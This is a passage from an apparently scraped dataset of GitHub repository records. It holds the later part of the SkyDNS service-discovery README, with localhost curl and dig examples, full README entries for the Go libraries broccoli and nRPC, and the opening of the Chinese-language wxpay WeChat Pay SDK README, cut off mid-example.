\"8.8.8.8:53,8.8.4.4:53\", in other words an IP:PORT, where multiple nameservers maybe listed separated by a comma \"`,`\". If this list is empty (\"\"),\nSkyDNS will parse /etc/resolv.conf and will use the nameservers listed there.\n- -tlskey - The path to the secret key to unlock your ssl cert.\n- -tlspem - The path to the X509 certificate that will secure skydns.\n\n##API\n### Service Announcements\nYou announce your service by submitting JSON over HTTP to SkyDNS with information about your service.\nThis information will then be available for queries either via DNS or HTTP.\n\nWhen providing information you will need to fill out the following values. Note you are free to use\nwhatever you like, so take the following list as a guide only.\n\n* Name - The name of your service, e.g., \"rails\", \"web\" or anything else you like\n* Version - A version string, note the dots in this string are translated to hyphens when\n querying via the DNS\n* Environment - Can be something as \"production\" or \"testing\"\n* Region - Where do these hosts live, e.g. \"east\", \"west\" or even \"test\"\n* Host, Port and TTL - Denote the actuals hosts and how long (TTL) this information is valid.\n\nWhen queried SkyDNS will return records containing these elements in the following\norder:\n\n ......skydns.local\n\nWhere `` is the identifier used when registering this host and service. And also\nnote the `` corresponds with the Name given above.\n\nNote some of these elements may contain a wildcard or be left out completely,\nsee the section named \"Wildcards\" below for more information.\n\n#### Without Shared Secret\n`curl -X PUT -L http://localhost:8080/skydns/services/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\",\"Port\":9000,\"TTL\":10}'`\n\n#### With Shared Secret\nYou have the ability to use a shared secret with SkyDns. To take advantage of the shared secret you would start skydns with the -secret= flag.\n`curl -X PUT -H \"Authorization mysupersecretsharedsecret\" -L http://localhost:8080/skydns/services/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\",\"Port\":9000,\"TTL\":10}'`\n\nIf unsuccessful you should receive an HTTP status code of: **401 Unauthorized**\n\n#### Starting with TLS\nIf you supply the flags --tls-key and --tls-pem Skydns will assume your http interface should be tls. To start with tls it should look something like this.\n\n```bash\ngo run main.go --tls-key=/path/to/secret.key --tls-pem=/path/to/cert.pem\n\n```\n\n#### Result\n\nIf successful you should receive an HTTP status code of: **201 Created**\n\nIf a service with this UUID already exists you will receive back an HTTP status\ncode of: **409 Conflict**\n\nSkyDNS will now have an entry for your service that will live for the number\nof seconds supplied in your TTL (10 seconds in our example), unless you send a\nheartbeat to update the TTL.\n\nNote that instead of a hostname you can also use an IP address (IPv4 or IPV6),\nin that case SkyDNS will make up an hostname that is used in the SRV record\n(defaults to UUID.skydns.local) and adds the IP adress as an A or AAAAA record\nin the additional section for this hostname.\n\n### Heartbeat / Keep alive\nSkyDNS requires that services submit an HTTP request to update their TTL within\nthe TTL they last supplied. If the service fails to do so within this timeframe\nSkyDNS will expire the service automatically. This will allow for nodes to fail\nand DNS to reflect this quickly.\n\nYou can update your TTL by sending an HTTP request to SkyDNS with an updated\nTTL, it can be the same as before to allow it to live for another 10s, or it can\nbe adjusted to a shorter or longer duration.\n\n`curl -X PATCH -L http://localhost:8080/skydns/services/1001 -d '{\"TTL\":10}'`\n\n### Service Removal\nIf you wish to remove your service from SkyDNS for any reason without waiting for the TTL to expire, you simply send an HTTP DELETE.\n\n`curl -X DELETE -L http://localhost:8080/skydns/services/1001`\n\n### Retrieve Service Info via API\nCurrently you may only retrieve a service's info by UUID of the service, in the\nfuture we may implement querying of the services similar to the DNS interface.\n\n`curl -X GET -L http://localhost:8080/skydns/services/1001`\n\n### Call backs\nRegistering a call back is similar to registering a service. A service that\nregisters a call back will receive an HTTP request. Every time something changes\nin the service: the callback is executed, currently they are called when the\nservice is deleted.\n\n`curl -X PUT -L http://localhost:8080/skydns/callbacks/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\",Reply:\"web2.example.nl\",\"Port\":5441}'`\n\nThis will result in the call back being sent to `web2.example.nl` on port 5441. The\ncallback itself will be a HTTP DELETE:\n\n`curl -X DELETE -L http://web2.example.nl:5441/skydns/callbacks/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\"}'`\n\n##Discovery (DNS)\nYou can find services by querying SkyDNS via any DNS client or utility. It uses a known domain syntax with wildcards to find matching services.\n\nPriorities and Weights are based on the requested Region, as well as how many nodes are available matching the current request in the given region.\n\n###Domain Format\nThe domain syntax when querying follows a pattern where the right\nmost positions are more generic, than the subdomains to their left:\n*\\.\\.\\.\\.\\.\\.skydns.local*.\nThis allows for you to supply only the positions you care about:\n\n- authservice.production.skydns.local - For instance would return all services with the name AuthService in the production environment, regardless of the Version, Region, or Host\n- 1-0-0.authservice.production.skydns.local - Is the same as above but restricting it to only version 1.0.0\n- east.1-0-0.authservice.production.skydns.local - Would add the restriction that the services must be running in the East region\n\n#### Wildcards\n\nIn addition to only needing to specify as much of the domain as required for the granularity level you're looking for, you may also supply the wildcard `*` in any of the positions.\n\n- east.*.*.production.skydns.local - Would return all services in the East region, that are a part of the production environment.\n\n###Examples\n\nLet's take a look at some results. First we need to add a few services so we have services to query against.\n\n\t// Service 1001 (East Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"web1.site.com\",\"Port\":80,\"TTL\":4000}'\n\n\t// Service 1002 (East Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1002 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"web2.site.com\",\"Port\":8080,\"TTL\":4000}'\n\n\t// Service 1003 (West Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1003 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"web3.site.com\",\"Port\":80,\"TTL\":4000}'\n\n\t// Service 1004 (West Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1004 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"web4.site.com\",\"Port\":80,\"TTL\":4000}'\n\nNow we can try some of our example DNS lookups:\n#####All services in the Production Environment\n`dig @localhost production.skydns.local SRV`\n\n\t;; QUESTION SECTION:\n\t;production.skydns.local.\t\t\tIN\tSRV\n\n\t;; ANSWER SECTION:\n\tproduction.skydns.local.\t\t629\t\tIN\tSRV\t10 20 80 web1.site.com.\n\tproduction.skydns.local.\t\t3979\tIN\tSRV\t10 20 8080 web2.site.com.\n\tproduction.skydns.local.\t\t3629\tIN\tSRV\t10 20 9000 server24.\n\tproduction.skydns.local.\t\t3985\tIN\tSRV\t10 20 80 web3.site.com.\n\tproduction.skydns.local.\t\t3990\tIN\tSRV\t10 20 80 web4.site.com.\n\n#####All TestService instances in Production Environment\n`dig @localhost testservice.production.skydns.local SRV`\n\n\t;; QUESTION SECTION:\n\t;testservice.production.skydns.local.\t\tIN\tSRV\n\n\t;; ANSWER SECTION:\n\ttestservice.production.skydns.local.\t615\t\tIN\tSRV\t10 20 80 web1.site.com.\n\ttestservice.production.skydns.local.\t3966\tIN\tSRV\t10 20 8080 web2.site.com.\n\ttestservice.production.skydns.local.\t3615\tIN\tSRV\t10 20 9000 server24.\n\ttestservice.production.skydns.local.\t3972\tIN\tSRV\t10 20 80 web3.site.com.\n\ttestservice.production.skydns.local.\t3976\tIN\tSRV\t10 20 80 web4.site.com.\n\n#####All TestService v1.0.0 Instances in Production Environment\n`dig @localhost 1-0-0.testservice.production.skydns.local SRV`\n\n\t;; QUESTION SECTION:\n\t;1-0-0.testservice.production.skydns.local.\tIN\tSRV\n\n\t;; ANSWER SECTION:\n\t1-0-0.testservice.production.skydns.local. 600 IN\tSRV\t10 20 80 web1.site.com.\n\t1-0-0.testservice.production.skydns.local. 3950 IN\tSRV\t10 20 8080 web2.site.com.\n\t1-0-0.testservice.production.skydns.local. 3600 IN\tSRV\t10 20 9000 server24.\n\t1-0-0.testservice.production.skydns.local. 3956 IN\tSRV\t10 20 80 web3.site.com.\n\t1-0-0.testservice.production.skydns.local. 3961 IN\tSRV\t10 20 80 web4.site.com.\n\n#####All TestService Instances at any version, within the East region\n`dig @localhost east.*.testservice.production.skydns.local SRV`\n\nThis is where we've changed things up a bit, notice we used the \"*\" wildcard for\nversion so we get any version, and because we've supplied an explicit region\nthat we're looking for we get that as the highest DNS priority, with the weight\nbeing distributed evenly, then all of our West instances still show up for\nfail-over, but with a higher Priority.\n\n\t;; QUESTION SECTION:\n\t;east.*.testservice.production.skydns.local. IN\tSRV\n\n\t;; ANSWER SECTION:\n\teast.*.testservice.production.skydns.local. 531 IN SRV\t10 50 80 web1.site.com.\n\teast.*.testservice.production.skydns.local. 3881 IN SRV\t10 50 8080 web2.site.com.\n\teast.*.testservice.production.skydns.local. 3531 IN SRV\t20 33 9000 server24.\n\teast.*.testservice.production.skydns.local. 3887 IN SRV\t20 33 80 web3.site.com.\n\teast.*.testservice.production.skydns.local. 3892 IN SRV\t20 33 80 web4.site.com.\n\n\n####A Records\nTo return A records, simply run a normal DNS query for a service matching the above patterns.\n\nLet's add some web servers to SkyDNS:\n\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1011 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"127.0.0.10\",\"Port\":80,\"TTL\":400000}'\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1012 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"127.0.0.11\",\"Port\":80,\"TTL\":400000}'\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1013 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"127.0.0.12\",\"Port\":80,\"TTL\":400000}'\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1014 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"127.0.0.13\",\"Port\":80,\"TTL\":400000}'\n\nNow do a normal DNS query:\n`dig rails.production.skydns.local`\n\n\t;; QUESTION SECTION:\n\t;rails.production.skydns.local.\tIN\tA\n\n\t;; ANSWER SECTION:\n\trails.production.skydns.local. 399918 IN A\t127.0.0.10\n\trails.production.skydns.local. 399918 IN A\t127.0.0.11\n\trails.production.skydns.local. 399918 IN A\t127.0.0.12\n\trails.production.skydns.local. 399919 IN A\t127.0.0.13\n\nNow you have a list of all known IP Addresses registered running the `rails`\nservice name. Because we're returning A records and not SRV records, there\nare no ports listed, so this is only useful when you're querying for services\nrunning on ports known to you in advance. Notice, we didn't specify version or\nregion, but we could have.\n\n####DNS Forwarding\n\nBy specifying `-nameserver=\"8.8.8.8:53,8.8.4.4:53` on the `skydns` command line,\nyou create a DNS forwarding proxy. In this case it round robins between the two\nnameserver IPs mentioned on the command line.\n\nRequests for which SkyDNS isn't authoritative\nwill be forwarded and proxied back to the client. This means that you can set\nSkyDNS as the primary DNS server in `/etc/resolv.conf` and use it for both service\ndiscovery and normal DNS operations.\n\n*Please test this before relying on it in production, as there may be edge cases that don't work as planned.*\n\n####DNSSEC\n\nSkyDNS support signing DNS answers (also know as DNSSEC). To use it you need to\ncreate a DNSSEC keypair and use that in SkyDNS. For instance if the domain for\nSkyDNS is `skydns.local`:\n\n dnssec-keygen skydns.local\n Generating key pair............++++++ ...................................++++++\n Kskydns.local.+005+49860\n\nThis creates two files both with the basename `Kskydns.local.+005.49860`, one of the\nextension `.key` (this holds the public key) and one with the extension `.private` which\nhold the private key. The basename of this file should be given to SkyDNS's -dnssec\noption: `-dnssec=Kskydns.local.+005+49860`\n\nIf you then query with `dig +dnssec` you will get signatures, keys and nsec records returned.\n\n## License\nThe MIT License (MIT)\n\nCopyright \u00a9 2014 The SkyDNS Authors\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n", "readme_type": "markdown", "hn_comments": "Looks pretty cool. I think DNS, and particularly SRV records, unfortunately get overlooked as a simple tool for internal service discovery.Great to see an etcd backend. Nice work.One feature I'd love to see is support for an etcd discovery URL (versus having to provide an explicit list of peers). See: http://coreos.com/docs/cluster-management/setup/etcd-cluster...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thealetheia/broccoli", "link": "https://github.com/thealetheia/broccoli", "tags": [], "stars": 527, "description": "Using brotli compression to embed static files in Go.", "lang": "Go", "repo_lang": "", "readme": "# \ud83e\udd66 Broccoli\n> `go get -u aletheia.icu/broccoli`\n\n[![GoDoc](https://godoc.org/aletheia.icu/broccoli/fs?status.svg)](https://godoc.org/aletheia.icu/broccoli/fs)\n[![Travis](https://travis-ci.org/aletheia-icu/broccoli.svg)](https://travis-ci.org/aletheia-icu/broccoli)\n[![Go Report Card](https://goreportcard.com/badge/aletheia.icu/broccoli/fs)](https://goreportcard.com/report/aletheia.icu/broccoli/fs)\n[![codecov.io](https://codecov.io/gh/aletheia-icu/broccoli/coverage.svg)](https://codecov.io/gh/aletheia-icu/broccoli)\n\nBroccoli uses [brotli](https://github.com/google/brotli) compression to embed a\nvirtual file system of static files inside Go executables.\n\nA few reasons to pick broccoli over the alternatives:\n\n- \u26a1\ufe0f The average is 13-25% smaller binary size due to use of superior\ncompression algorithm, [brotli](https://github.com/google/brotli).\n- \ud83d\udcbe Broccoli supports bundling of multiple source directories, only relies on\n`go generate` command-line interface and doesn't require configuration files.\n- \ud83d\udd11 Optional decompression is something you may want; when it's enabled, files\nare decompressed only when they are read the first time.\n- \ud83d\ude99 You might want to target `wasm/js` architecture.\n- \ud83d\udcf0 There is `-gitignore` option to ignore files, already ignored by your\nexisting .gitignore files.\n\n### Performance\nAdmittedly, there are already many packages providing similar functionality out\nthere in the wild. Tim Shannon did an overall pretty good overview of them in\n[Choosing A Library to Embed Static Assets in Go](https://tech.townsourced.com/post/embedding-static-files-in-go/),\nbut it should be outdated by at least two years, so although we subscribe to the\nanalysis, we cannot guarantee whether if it's up\u2013to\u2013date. Most if not all of the\npackages mentioned in the article, rely on gzip compression and most of them,\nunfortunately are not compatible with `wasm/js` architecture, due to some quirk\nthat has to do with their use of `http` package. This, among other things, was\nthe driving force behind the creation of broccoli.\n\nThe most feature-complete library from the comparison table seems to be\n[fileb0x](https://github.com/UnnoTed/fileb0x).\n\n#### How does broccoli compare to fileb0x?\nFeature | fileb0x | broccoli\n--------------------- | ----------- | ------------------\ncompression | gzip | brotli (-20% avg.)\noptional decompression | yes | yes\ncompression levels | yes | yes (1-11)\ndifferent build tags for each file | yes | no\nexclude / ignore files | glob | glob\nunexported vars/funcs | optional | optional\nvirtual memory file system | yes | yes\nhttp file system | yes | yes\nreplace text in files | yes | no\nglob support | yes | yes\nregex support | no | no\nconfig file | yes | no\nupdate files remotely | yes | no\n.gitignore support | no | yes\n\n#### How does it compare to others?\n![](https://i.imgur.com/vB9Miae.png)\n\nBroccoli seems to outperform the existing solutions.\n\nWe did [benchmarks](https://vcs.aletheia.icu/lads/broccoli-bench), please feel\nfree to review them and correct us whenever our methodology could be flawed.\n\n### Usage\n```\n$ broccoli\nUsage: broccoli [options]\n\nBroccoli uses brotli compression to embed a virtual file system in Go executables.\n\nOptions:\n\t-src folder[,file,file2]\n\t\tThe input files and directories, \"public\" by default.\n\t-o\n\t\tName of the generated file, follows input by default.\n\t-var=br\n\t\tName of the exposed variable, \"br\" by default.\n\t-include *.html,*.css\n\t\tWildcard for the files to include, no default.\n\t-exclude *.wasm\n\t\tWildcard for the files to exclude, no default.\n\t-opt\n\t\tOptional decompression: if enabled, files will only be decompressed\n\t\ton the first time they are read.\n\t-gitignore\n\t\tEnables .gitignore rules parsing in each directory, disabled by default.\n\t-quality [level]\n\t\tBrotli compression level (1-11), the highest by default.\n\nGenerate a broccoli.gen.go file with the variable broccoli:\n\t//go:generate broccoli -src assets -o broccoli -var broccoli\n\nGenerate a regular public.gen.go file, but include all *.wasm files:\n\t//go:generate broccoli -src public -include=\"*.wasm\"\n```\n\nHow broccoli is used in the user code:\n```go\n//go:generate broccoli -src=public,others -o assets\n\nfunc init() {\n br.Walk(\"public\", func(path string, info os.FileInfo, err error) error {\n // walk...\n return nil\n })\n}\n\nfunc main() {\n http.ListenAndServe(\":8080\", br.Serve(\"public\"))\n}\n```\n\n### Credits\nLicense: [MIT](https://vcs.aletheia.icu/lads/broccoli/src/branch/master/LICENSE)\n\nWe would like to thank brotli development team from Google and Andy Balholm, for\nhis c2go pure-Go port of the library. Broccoli itself is an effort of a mentoring\nexperiment, lead by [@tucnak](https://github.com/tucnak) on the foundation of\n[Aletheia](https://aletheia.icu).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nats-rpc/nrpc", "link": "https://github.com/nats-rpc/nrpc", "tags": ["grpc", "protobuf", "rpc-framework", "go"], "stars": 526, "description": "nRPC is like gRPC, but over NATS", "lang": "Go", "repo_lang": "", "readme": "# nRPC\n\n[![Build Status](https://travis-ci.org/nats-rpc/nrpc.svg?branch=master)](https://travis-ci.org/nats-rpc/nrpc)\n\nnRPC is an RPC framework like [gRPC](https://grpc.io/), but for\n[NATS](https://nats.io/).\n\nIt can generate a Go client and server from the same .proto file that you'd\nuse to generate gRPC clients and servers. The server is generated as a NATS\n[MsgHandler](https://godoc.org/github.com/nats-io/nats.go#MsgHandler).\n\n## Why NATS?\n\nDoing RPC over NATS'\n[request-response model](http://nats.io/documentation/concepts/nats-req-rep/)\nhas some advantages over a gRPC model:\n\n- **Minimal service discovery**: The clients and servers only need to know the\n endpoints of a NATS cluster. The clients do not need to discover the\n endpoints of individual services they depend on.\n- **Load balancing without load balancers**: Stateless microservices can be\n hosted redundantly and connected to the same NATS cluster. The incoming\n requests can then be random-routed among these using NATS\n [queueing](http://nats.io/documentation/concepts/nats-queueing/). There is\n no need to setup a (high availability) load balancer per microservice.\n\nThe lunch is not always free, however. At scale, the NATS cluster itself can\nbecome a bottleneck. Features of gRPC like streaming and advanced auth are not\navailable.\n\nStill, NATS - and nRPC - offer much lower operational complexity if your\nscale and requirements fit.\n\nAt RapidLoop, we use this model for our [OpsDash](https://www.opsdash.com)\nSaaS product in production and are quite happy with it. nRPC is the third\niteration of an internal library.\n\n## Overview\n\nnRPC comes with a protobuf compiler plugin `protoc-gen-nrpc`, which generates\nGo code from a .proto file.\n\nGiven a .proto file like [helloworld.proto](https://github.com/grpc/grpc-go/blob/master/examples/helloworld/helloworld/helloworld.proto), the usage is like this:\n\n```\n$ ls\nhelloworld.proto\n$ protoc --go_out=. --nrpc_out=. helloworld.proto\n$ ls\nhelloworld.nrpc.go\thelloworld.pb.go\thelloworld.proto\n```\n\nThe .pb.go file, which contains the definitions for the message classes, is\ngenerated by the standard Go plugin for protoc. The .nrpc.go file, which\ncontains the definitions for a client, a server interface, and a NATS handler\nis generated by the nRPC plugin.\n\nHave a look at the generated and example files:\n\n- the service definition [helloworld.proto](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/helloworld/helloworld.proto)\n- the generated nrpc go file [helloworld.nrpc.go](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/helloworld/helloworld.nrpc.go)\n- an example server [greeter_server/main.go](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/greeter_server/main.go)\n- an example client [greeter_client/main.go](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/greeter_client/main.go)\n\n### How It Works\n\nThe .proto file defines messages (like HelloRequest and HelloReply in the\nexample) and services (Greeter) that have methods (SayHello).\n\nThe messages are generated as Go structs by the regular Go protobuf compiler\nplugin and gets written out to \\*.pb.go files.\n\nFor the rest, nRPC generates three logical pieces.\n\nThe first is a Go interface type (GreeterServer) which your actual\nmicroservice code should implement:\n\n```\n// This is what is contained in the .proto file\nservice Greeter {\n rpc SayHello (HelloRequest) returns (HelloReply) {}\n}\n\n// This is the generated interface which you've to implement\ntype GreeterServer interface {\n SayHello(ctx context.Context, req HelloRequest) (resp HelloReply, err error)\n}\n```\n\nThe second is a client (GreeterClient struct). This struct has\nmethods with appropriate types, that correspond to the service definition. The\nclient code will marshal and wrap the request object (HelloRequest) and do a\nNATS `Request`.\n\n```\n// The client is associated with a NATS connection.\nfunc NewGreeterClient(nc *nats.Conn) *GreeterClient {...}\n\n// And has properly typed methods that will marshal and perform a NATS request.\nfunc (c *GreeterClient) SayHello(req HelloRequest) (resp HelloReply, err error) {...}\n```\n\nThe third and final piece is the handler (GreeterHandler). Given a NATS\nconnection and a server implementation, it can accept NATS requests in the\nformat sent by the client above. It should be installed as a message handler for\na particular NATS subject (defaults to the name of the service) using the\nNATS Subscribe() or QueueSubscribe() methods. It will invoke the appropriate\nmethod of the GreeterServer interface upon receiving the appropriate request.\n\n```\n// A handler is associated with a NATS connection and a server implementation.\nfunc NewGreeterHandler(ctx context.Context, nc *nats.Conn, s GreeterServer) *GreeterHandler {...}\n\n// It has a method that can (should) be used as a NATS message handler.\nfunc (h *GreeterHandler) Handler(msg *nats.Msg) {...}\n```\n\nStanding up a microservice involves:\n\n- writing the .proto service definition file\n- generating the \\*.pb.go and \\*.nrpc.go files\n- implementing the server interface\n- writing a main app that will connect to NATS and start the handler ([see\n example](https://github.com/nats-rpc/nrpc/blob/master/examples/helloworld/greeter_server/main.go))\n\nTo call the service:\n\n- import the package that contains the generated *.nrpc.go files\n- in the client code, connect to NATS\n- create a Caller object and call the methods as necessary ([see example](https://github.com/nats-rpc/nrpc/blob/master/examples/helloworld/greeter_client/main.go))\n\n## Features\n\nThe following wiki pages describe nRPC features in more detail:\n\n- [Load Balancing](https://github.com/nats-rpc/nrpc/wiki/Load-Balancing)\n- [Metrics Instrumentation](https://github.com/nats-rpc/nrpc/wiki/Metrics-Instrumentation)\n using Prometheus\n\n## Installation\n\nnRPC needs Go 1.7 or higher. $GOPATH/bin needs to be in $PATH for the protoc\ninvocation to work. To generate code, you need the protobuf compiler (which\nyou can install from [here](https://github.com/google/protobuf/releases))\nand the nRPC protoc plugin.\n\nTo install the nRPC protoc plugin:\n\n```\n$ go get github.com/nats-rpc/nrpc/protoc-gen-nrpc\n```\n\nTo build and run the example greeter_server:\n\n```\n$ go get github.com/nats-rpc/nrpc/examples/helloworld/greeter_server\n$ greeter_server\nserver is running, ^C quits.\n```\n\nTo build and run the example greeter_client:\n\n```\n$ go get github.com/nats-rpc/nrpc/examples/helloworld/greeter_client\n$ greeter_client\nGreeting: Hello world\n$\n```\n\n## Documentation\n\nTo learn more about describing gRPC services using .proto files, see [here](https://grpc.io/docs/guides/concepts.html).\nTo learn more about NATS, start with their [website](https://nats.io/). To\nlearn more about nRPC, um, read the source code.\n\n## Status\n\nnRPC is in alpha. This means that it will work, but APIs may change without\nnotice.\n\nCurrently there is support only for Go clients and servers.\n\nBuilt by RapidLoop. Released under Apache 2.0 license.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "objcoding/wxpay", "link": "https://github.com/objcoding/wxpay", "tags": [], "stars": 526, "description": "\ud83d\udd25\u5fae\u4fe1\u652f\u4ed8(WeChat Pay) SDK for Golang", "lang": "Go", "repo_lang": "", "readme": "# wxpay \n\n![Powered by zch](https://img.shields.io/badge/Powered%20by-zch-blue.svg?style=flat-square) ![Language](https://img.shields.io/badge/language-Go-orange.svg) [![License](https://img.shields.io/badge/license-MIT-blue.svg)](./LICENSE.md)\n\n\nwxpay \u63d0\u4f9b\u4e86\u4ee5\u4e0b\u7684\u65b9\u6cd5\uff1a\n\n| \u65b9\u6cd5\u540d | \u8bf4\u660e |\n| ---------------- | ----------- |\n| MicroPay | \u5237\u5361\u652f\u4ed8 |\n| UnifiedOrder | \u7edf\u4e00\u4e0b\u5355 |\n| OrderQuery | \u67e5\u8be2\u8ba2\u5355 |\n| Reverse | \u64a4\u9500\u8ba2\u5355 |\n| CloseOrder | \u5173\u95ed\u8ba2\u5355 |\n| Refund | \u7533\u8bf7\u9000\u6b3e |\n| RefundQuery | \u67e5\u8be2\u9000\u6b3e |\n| DownloadBill | \u4e0b\u8f7d\u5bf9\u8d26\u5355 |\n| Report | \u4ea4\u6613\u4fdd\u969c |\n| ShortUrl | \u8f6c\u6362\u77ed\u94fe\u63a5 |\n| AuthCodeToOpenid | \u6388\u6743\u7801\u67e5\u8be2openid |\n\n* \u53c2\u6570\u4e3a`Params`\u7c7b\u578b\uff0c\u8fd4\u56de\u7c7b\u578b\u4e5f\u662f`Params`\uff0c`Params` \u662f\u4e00\u4e2a map[string]string \u7c7b\u578b\u3002\n* \u65b9\u6cd5\u5185\u90e8\u4f1a\u5c06\u53c2\u6570\u4f1a\u8f6c\u6362\u6210\u542b\u6709`appid`\u3001`mch_id`\u3001`nonce_str`\u3001`sign_type`\u548c`sign`\u7684XML\uff1b\n* \u9ed8\u8ba4\u4f7f\u7528MD5\u8fdb\u884c\u7b7e\u540d\uff1b\n* \u901a\u8fc7HTTPS\u8bf7\u6c42\u5f97\u5230\u8fd4\u56de\u6570\u636e\u540e\u4f1a\u5bf9\u5176\u505a\u5fc5\u8981\u7684\u5904\u7406\uff08\u4f8b\u5982\u9a8c\u8bc1\u7b7e\u540d\uff0c\u7b7e\u540d\u9519\u8bef\u5219\u629b\u51fa\u5f02\u5e38\uff09\u3002\n* \u5bf9\u4e8eDownloadBill\uff0c\u65e0\u8bba\u662f\u5426\u6210\u529f\u90fd\u8fd4\u56deMap\uff0c\u4e14\u90fd\u542b\u6709`return_code`\u548c`return_msg`\u3002\u82e5\u6210\u529f\uff0c\u5176\u4e2d`return_code`\u4e3a`SUCCESS`\uff0c\u53e6\u5916`data`\u5bf9\u5e94\u5bf9\u8d26\u5355\u6570\u636e\u3002\n\n\n## \u5b89\u88c5\n\n```bash\n$ go get github.com/objcoding/wxpay\n\n```\n\n## go modules\n```cgo\n// go.mod\nrequire github.com/objcoding/wxpay v1.0.5\n\n```\n\n\n## \u793a\u4f8b\n\n```cgo\n// \u521b\u5efa\u652f\u4ed8\u8d26\u6237\naccount1 := wxpay.NewAccount(\"appid\", \"mchid\", \"apiKey\", false)\naccount2 := wxpay.NewAccount(\"appid\", \"mchid\", \"apiKey\", false)\n\n// \u65b0\u5efa\u5fae\u4fe1\u652f\u4ed8\u5ba2\u6237\u7aef\nclient := wxpay.NewClient(account1)\n\n// \u8bbe\u7f6e\u8bc1\u4e66\naccount.SetCertData(\"\u8bc1\u4e66\u5730\u5740\")\n\n// \u8bbe\u7f6e\u652f\u4ed8\u8d26\u6237\nclient.setAccount(account2)\n\n// \u8bbe\u7f6ehttp\u8bf7\u6c42\u8d85\u65f6\u65f6\u95f4\nclient.SetHttpConnectTimeoutMs(2000)\n\n// \u8bbe\u7f6ehttp\u8bfb\u53d6\u4fe1\u606f\u6d41\u8d85\u65f6\u65f6\u95f4\nclient.SetHttpReadTimeoutMs(1000)\n\n// \u66f4\u6539\u7b7e\u540d\u7c7b\u578b\nclient.SetSignType(HMACSHA256)\n\n```\n\n```cgo\n// \u7edf\u4e00\u4e0b\u5355\nparams := make(wxpay.Params)\nparams.SetString(\"body\", \"test\").\n\t\tSetString(\"out_trade_no\", \"436577857\").\n\t\tSetInt64(\"total_fee\", 1).\n\t\tSetString(\"spbill_create_ip\", \"127.0.0.1\").\n\t\tSetString(\"notify_url\", \"http://notify.objcoding.com/notify\").\n\t\tSetString(\"trade_type\", \"APP\")\np, _ := client.UnifiedOrder(params)\n\n// \u8ba2\u5355\u67e5\u8be2\nparams := make(wxpay.Params)\nparams.SetString(\"out_trade_no\", \"3568785\")\np, _ := client.OrderQuery(params)\n\n// \u9000\u6b3e\nparams := make(wxpay.Params)\nparams.SetString(\"out_trade_no\", \"3568785\").\n\t\tSetString(\"out_refund_no\", \"19374568\").\n\t\tSetInt64(\"total_fee\", 1).\n\t\tSetInt64(\"refund_fee\", 1)\np, _ := client.Refund(params)\n\n// \u9000\u6b3e\u67e5\u8be2\nparams := make(wxpay.Params)\nparams.SetString(\"out_refund_no\", \"3568785\")\np, _ := client.RefundQuery(params)\n\n```\n\n\n```cgo\n// \u7b7e\u540d\nsignStr := client.Sign(params)\n\n// \u6821\u9a8c\u7b7e\u540d\nb := client.ValidSign(params)\n\n```\n\n```cgo\n// xml\u89e3\u6790\nparams := wxpay.XmlToMap(xmlStr)\n\n// map\u5c01\u88c5xml\u8bf7\u6c42\u53c2\u6570\nb := wxpay.MapToXml(params)\n\n```\n\n```cgo\n// 